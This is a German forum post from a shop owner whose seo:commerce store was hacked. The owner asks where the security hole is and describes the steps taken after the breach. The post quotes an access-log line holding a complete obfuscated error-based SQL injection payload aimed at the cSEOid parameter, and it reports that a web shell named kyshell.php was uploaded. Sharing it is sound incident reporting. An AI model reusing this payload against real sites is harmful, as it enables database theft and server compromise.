Hi,
heute wurde mein Shop seo:commerce Version: 2.1.2.11 Plus gehackt.
Hab natürlich sofort als ich es bemerkt den Admin Folder umbenannt, passwörter geändert und den Typen wie ich im log sehe ausgebremst.
Ist da in meiner Version eine Sicherheitslücke seitens der Programmierung - die Updates wurden laufend gemacht
[07/May/2014:11:11:49 +0200] "GET /de/....../?cSEOid=3u68al8js50rgvt7996b5hgog0'/**/and/**/(SeLeCt/**/1/**/FrOm(SeLeCt/**/count(*),CoNcAt((SeLeCt(SeLeCt(SeLeCt/**/DiStInCt/**/CoNcAt(0x217e21,ScHeMa_nAmE,0x217e21)/**/FrOm/**/information_schema.ScHeMaTa/**/WhErE/**/not/**/ScHeMa_nAmE=0x696e666f726d6174696f6e5f736368656d61/**/LiMiT/**/0,1))/**/FrOm/**/information_schema.TaBlEs/**/LiMiT/**/0,1),floor(rand(0)*2))x/**/FrOm/**/information_schema.TaBlEs/**/GrOuP/**/By/**/x)a)/**/and/**/'1'='1 HTTP/1.1" 200 738 "http://......../?cSEOid=3u68al…og0'/**/and/**/(SeLeCt/**/1/**/FrOm(SeLeCt/**/count(*),CoNcAt((SeLeCt(SeLeCt(SeLeCt/**/DiStInCt/**/CoNcAt(0x217e21,ScHeMa_nAmE,0x217e21)/**/FrOm/**/information_schema.ScHeMaTa/**/WhErE/**/not/**/ScHeMa_nAmE=0x696e666f726d6174696f6e5f736368656d61/**/LiMiT/**/0,1))/**/FrOm/**/information_schema.TaBlEs/**/LiMiT/**/0,1),floor(rand(0)*2))x/**/FrOm/**/information_schema.TaBlEs/**/GrOuP/**/By/**/x)a)/**/and/**/'1'='1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
Er hatte es geschafft sich das Admin Passwort auszulesen und eine php Datei Namens kyshell.php in den /media/content Ordner zu laden.
Bitte um Info wo sich da die Sicherheitslücke befindet, so eine Lücke wird ja einige der Shop-Kunden betreffen!